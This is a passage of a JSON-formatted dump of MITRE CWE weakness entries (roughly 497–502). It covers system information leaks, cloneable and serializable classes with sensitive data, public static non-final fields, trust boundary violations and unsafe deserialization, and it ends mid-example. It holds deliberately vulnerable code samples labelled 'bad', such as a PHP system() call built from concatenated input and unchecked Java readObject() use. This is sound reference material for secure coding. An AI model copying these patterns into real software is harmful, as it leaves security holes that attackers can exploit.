getCurrentUser();$command = \'ps aux | grep \' . $userName;system($command);","xhtml:br":["","","",""],"xhtml:i":"//assume getCurrentUser() returns a username that is guaranteed to be alphanumeric (avoiding CWE-78)"}},"Body_Text":"If invoked by an unauthorized web user, it is providing a web page of potentially sensitive information on the underlying system, such as command-line arguments (CWE-497). This program is also potentially vulnerable to a PATH based attack (CWE-426), as an attacker may be able to create malicious versions of the ps or grep commands. While the program does not explicitly raise privileges to run the system commands, the PHP interpreter may by default be running with higher privileges than users."},{"Intro_Text":"The following code prints an exception to the standard error stream:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"try {} catch (Exception e) {}","xhtml:div":[{"#text":"...","attr":{"@_style":"margin-left:10px;"}},{"#text":"e.printStackTrace();","attr":{"@_style":"margin-left:10px;"}}]}},{"attr":{"@_Nature":"bad"},"xhtml:div":{"#text":"try {} catch (Exception e) {}","xhtml:div":[{"#text":"...","attr":{"@_style":"margin-left:10px;"}},{"#text":"Console.Writeline(e);","attr":{"@_style":"margin-left:10px;"}}]}}],"Body_Text":"Depending upon the system configuration, this information can be dumped to a console, written to a log file, or exposed to a remote user. In some cases the error message tells the attacker precisely what sort of an attack the system will be vulnerable to. For example, a database error message can reveal that the application is vulnerable to a SQL injection attack. Other error messages can reveal more oblique clues about the system. In the example above, the search path could imply information about the type of operating system, the applications installed on the system, and the amount of care that the administrators have put into configuring the program."},{"Intro_Text":"The following code constructs a database connection string, uses it to create a new connection to the database, and prints it to the console.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C#"},"xhtml:div":{"#text":"string cs=\\"database=northwind; server=mySQLServer...\\";SqlConnection conn=new SqlConnection(cs);...Console.Writeline(cs);","xhtml:br":["","",""]}},"Body_Text":"Depending on the system configuration, this information can be dumped to a console, written to a log file, or exposed to a remote user. In some cases the error message tells the attacker precisely what sort of an attack the system is vulnerable to. For example, a database error message can reveal that the application is vulnerable to a SQL injection attack. Other error messages can reveal more oblique clues about the system. In the example above, the search path could imply information about the type of operating system, the applications installed on the system, and the amount of care that the administrators have put into configuring the program."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"System Information Leak"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"ERR01-J","Entry_Name":"Do not allow exceptions to expose sensitive information"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"170"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Name, References, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}],"Previous_Entry_Name":[{"#text":"System Information Leak","attr":{"@_Date":"2008-04-11"}},{"#text":"Information Leak of System Data","attr":{"@_Date":"2009-12-28"}},{"#text":"Exposure of System Data to an Unauthorized Control Sphere","attr":{"@_Date":"2020-02-24"}}]}},"498":{"attr":{"@_ID":"498","@_Name":"Cloneable Class Containing Sensitive Information","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The code contains a class with sensitive data, but the class is cloneable. The data can then be accessed by cloning the class.","Extended_Description":"Cloneable classes are effectively open classes, since data cannot be hidden in them. Classes that do not explicitly deny cloning can be cloned by any other class without running the constructor.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"200","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C#","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Note":"A class that can be cloned can be produced without executing the constructor. This is dangerous since the constructor may perform security-related checks. By allowing the object to be cloned, those checks may be bypassed."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"If you do make your classes clonable, ensure that your clone method is final and throw super.clone()."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following example demonstrates the weakness.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class CloneClient {}class Teacher implements Cloneable {}","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public CloneClient() //throwsjava.lang.CloneNotSupportedException {}public static void main(String args[]) {}","xhtml:br":["",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"Teacher t1 = new Teacher(\\"guddu\\",\\"22,nagar road\\");//...// Do some stuff to remove the teacher.Teacher t2 = (Teacher)t1.clone();System.out.println(t2.name);","xhtml:br":["","","","",""]}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"new CloneClient();","xhtml:br":""}}]}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public Object clone() {}public String name;public String clas;public Teacher(String name,String clas) {}","xhtml:br":["","","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"try {}catch (java.lang.CloneNotSupportedException e) {}","xhtml:br":["",""],"xhtml:div":[{"#text":"return super.clone();","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"throw new RuntimeException(e.toString());","xhtml:br":""}}]}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"this.name = name;this.clas = clas;","xhtml:br":["",""]}}]}}],"xhtml:br":""}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"public final void clone() throws java.lang.CloneNotSupportedException {}","xhtml:div":{"#text":"throw new java.lang.CloneNotSupportedException();","attr":{"@_style":"margin-left:10px;"}}}}],"Body_Text":"Make classes uncloneable by defining a clone function like:"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Information leak through class cloning"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"OBJ07-J","Entry_Name":"Sensitive classes must not let themselves be copied"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-18"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Description, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences, Description, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Information Leak through Class Cloning","attr":{"@_Date":"2011-03-29"}}}},"499":{"attr":{"@_ID":"499","@_Name":"Serializable Class Containing Sensitive Data","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The code contains a class with sensitive data, but the class does not explicitly deny serialization. The data can be accessed by serializing the class through another class.","Extended_Description":"Serializable classes are effectively open classes since data cannot be hidden in them. Classes that do not explicitly deny serialization can be serialized by any other class, which can then in turn use the data stored inside it.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"200","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"an attacker can write out the class to a byte stream, then extract the important data from it."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"In Java, explicitly define final writeObject() to prevent serialization. This is the recommended solution. Define the writeObject() function to throw an exception explicitly denying serialization."},{"Phase":"Implementation","Description":"Make sure to prevent serialization of your objects."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This code creates a new record for a medical patient:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"class PatientRecord {}","xhtml:div":{"#text":"private String name;private String socialSecurityNum;public Patient(String name,String ssn) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""],"xhtml:div":{"#text":"this.SetName(name);this.SetSocialSecurityNumber(ssn);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}}},"Body_Text":"This object does not explicitly deny serialization, allowing an attacker to serialize an instance of this object and gain a patient\'s name and Social Security number even though those fields are private."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Information leak through serialization"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"SER03-J","Entry_Name":"Do not serialize unencrypted, sensitive data"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"SER05-J","Entry_Name":"Do not serialize instances of inner classes"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-18"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Description, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Information Leak through Serialization","attr":{"@_Date":"2008-04-11"}}}},"500":{"attr":{"@_ID":"500","@_Name":"Public Static Field Not Marked Final","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"An object contains a public static field that is not marked final, which might allow it to be modified in unexpected ways.","Extended_Description":"Public static variables can be read without an accessor and changed without a mutator by any classes in the application.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"493","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}]},"Background_Details":{"Background_Detail":"When a field is declared public but not final, the field can be read and written to by arbitrary Java code."},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Application Data","Note":"The object could potentially be tampered with."},{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"The object could potentially allow the object to be read."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Clearly identify the scope for all critical data elements, including whether they should be regarded as static."},{"Phase":"Implementation","Description":{"xhtml:p":["Make any static fields private and constant.","A constant field is denoted by the keyword \'const\' in C/C++ and \' final\' in Java"]}}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following examples use of a public static String variable to contain the name of a property/configuration file for the application.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C++"},"xhtml:div":{"#text":"class SomeAppClass {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public:...","xhtml:br":["",""],"xhtml:div":{"#text":"static string appPropertiesConfigFile = \\"app/properties.config\\";","attr":{"@_style":"margin-left:10px;"}}}}}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class SomeAppClass {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public static String appPropertiesFile = \\"app/Application.properties\\";...","xhtml:br":["",""]}}}},{"attr":{"@_Nature":"good","@_Language":"C++"},"xhtml:div":{"#text":"class SomeAppClass {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public:...","xhtml:br":["",""],"xhtml:div":{"#text":"static const string appPropertiesConfigFile = \\"app/properties.config\\";","attr":{"@_style":"margin-left:10px;"}}}}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"public class SomeAppClass {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public static final String appPropertiesFile = \\"app/Application.properties\\";...","xhtml:br":["",""]}}}}],"Body_Text":"Having a public static variable that is not marked final (constant) may allow the variable to the altered in a way not intended by the application. In this example the String variable can be modified to indicate a different on nonexistent properties file which could cause the application to crash or caused unexpected behavior."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Overflow of static internal buffer"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"OBJ10-J","Entry_Name":"Do not use public static nonfinal variables"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP28","Entry_Name":"Unexpected access points"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-18"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-05","Modification_Comment":"Significant clarification of this entry, and improved examples."},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Background_Details, Demonstrative_Examples, Description, Name, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples, Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}],"Previous_Entry_Name":[{"#text":"Overflow of Static Internal Buffer","attr":{"@_Date":"2008-04-11"}},{"#text":"Static Field Not Marked Final","attr":{"@_Date":"2008-11-24"}}]}},"501":{"attr":{"@_ID":"501","@_Name":"Trust Boundary Violation","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product mixes trusted and untrusted data in the same data structure or structured message.","Extended_Description":"A trust boundary can be thought of as line drawn through a program. On one side of the line, data is untrusted. On the other side of the line, data is assumed to be trustworthy. The purpose of validation logic is to allow data to safely cross the trust boundary - to move from untrusted to trusted. A trust boundary violation occurs when a program blurs the line between what is trusted and what is untrusted. By combining trusted and untrusted data in the same data structure, it becomes easier for programmers to mistakenly trust unvalidated data.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design"}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following code accepts an HTTP request and stores the username parameter in the HTTP session object before checking to ensure that the user has been authenticated.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"usrname = request.getParameter(\\"usrname\\");if (session.getAttribute(ATTR_USR) == null) {}","xhtml:br":"","xhtml:div":{"#text":"session.setAttribute(ATTR_USR, usrname);","attr":{"@_style":"margin-left:10px;"}}}},{"attr":{"@_Nature":"bad","@_Language":"C#"},"xhtml:div":{"#text":"usrname = request.Item(\\"usrname\\");if (session.Item(ATTR_USR) == null) {}","xhtml:br":"","xhtml:div":{"#text":"session.Add(ATTR_USR, usrname);","attr":{"@_style":"margin-left:10px;"}}}}],"Body_Text":"Without well-established and maintained trust boundaries, programmers will inevitably lose track of which pieces of data have been validated and which have not. This confusion will eventually allow some data to be used without first being validated."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Trust Boundary Violation"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Demonstrative_Example, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References"}]}},"502":{"attr":{"@_ID":"502","@_Name":"Deserialization of Untrusted Data","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The application deserializes untrusted data without sufficiently verifying that the resulting data will be valid.","Extended_Description":{"xhtml:p":["It is often convenient to serialize objects for communication or to save them for later use. However, deserialized data or code can often be modified without using the provided accessor functions if it does not use cryptography to protect itself. Furthermore, any cryptography would still be client-side security -- which is a dangerous security assumption.","Data that is untrusted can not be trusted to be well-formed.","When developers place no restrictions on \\"gadget chains,\\" or series of instances and method invocations that can self-execute during the deserialization process (i.e., before the object is returned to the caller), it is sometimes possible for attackers to leverage them to perform unauthorized actions, like generating a shell."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"913","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"913","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"915","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Ruby","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"PHP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Python","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"JavaScript","@_Prevalence":"Undetermined"}}]},"Background_Details":{"Background_Detail":"Serialization and deserialization refer to the process of taking program-internal object-related data, packaging it in a way that allows the data to be externally stored or transferred (\\"serialization\\"), then extracting the serialized data to reconstruct the original object (\\"deserialization\\")."},"Alternate_Terms":{"Alternate_Term":[{"Term":"Marshaling, Unmarshaling","Description":"Marshaling and unmarshaling are effectively synonyms for serialization and deserialization, respectively."},{"Term":"Pickling, Unpickling","Description":"In Python, the \\"pickle\\" functionality is used to perform serialization and deserialization."},{"Term":"PHP Object Injection","Description":"Some PHP application researchers use this term when attacking unsafe use of the unserialize() function; but it is also used for CWE-915."}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":"Integrity","Impact":["Modify Application Data","Unexpected State"],"Note":"Attackers can modify unexpected objects or data that was assumed to be safe from modification."},{"Scope":"Availability","Impact":"DoS: Resource Consumption (CPU)","Note":"If a function is making an assumption on when to terminate, based on a sentry in a string, it could easily never terminate."},{"Scope":"Other","Impact":"Varies by Context","Note":"The consequences can vary widely, because it depends on which objects or methods are being deserialized, and how they are used. Making an assumption that the code in the deserialized object is valid is dangerous and can enable exploitation."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":["Architecture and Design","Implementation"],"Description":"If available, use the signing/sealing features of the programming language to assure that deserialized data has not been tainted. For example, a hash-based message authentication code (HMAC) could be used to ensure that data has not been modified."},{"Phase":"Implementation","Description":"When deserializing data, populate a new object rather than just deserializing. The result is that the data flows through safe input validation and that the functions are safe."},{"Phase":"Implementation","Description":"Explicitly define a final object() to prevent deserialization."},{"Phase":["Architecture and Design","Implementation"],"Description":{"xhtml:p":["Make fields transient to protect them from deserialization.","An attempt to serialize and then deserialize a class containing transient fields will result in NULLs where the transient data should be. This is an excellent way to prevent time, environment-based, or sensitive variables from being carried over and used improperly."]}},{"Phase":"Implementation","Description":"Avoid having unnecessary types or gadgets available that can be leveraged for malicious ends. This limits the potential for unintended or unauthorized types and gadgets to be leveraged by the attacker. Add only acceptable classes to an allowlist. Note: new gadgets are constantly being discovered, so this alone is not a sufficient mitigation."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"This code snippet deserializes an object from a file and uses it as a UI button:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"try {}","xhtml:div":{"#text":"File file = new File(\\"object.obj\\");ObjectInputStream in = new ObjectInputStream(new FileInputStream(file));javax.swing.JButton button = (javax.swing.JButton) in.readObject();in.close();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""]}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"private final void readObject(ObjectInputStream in) throws java.io.IOException {throw new java.io.IOException(\\"Cannot be deserialized\\"); }","xhtml:br":""}}],"Body_Text":["This code does not attempt to verify the source or contents of the file before deserializing it. An attacker may be able to replace the intended file with a file that contains arbitrary malicious code which will be executed when the button is pressed.","To mitigate this, explicitly define final readObject() to prevent deserialization. An example of this is:"]},{"Intro_Text":"In Python, the Pickle library handles the serialization and deserialization processes. In this example derived from [REF-467], the code receives and parses data, and afterwards tries to authenticate a user based on validating a 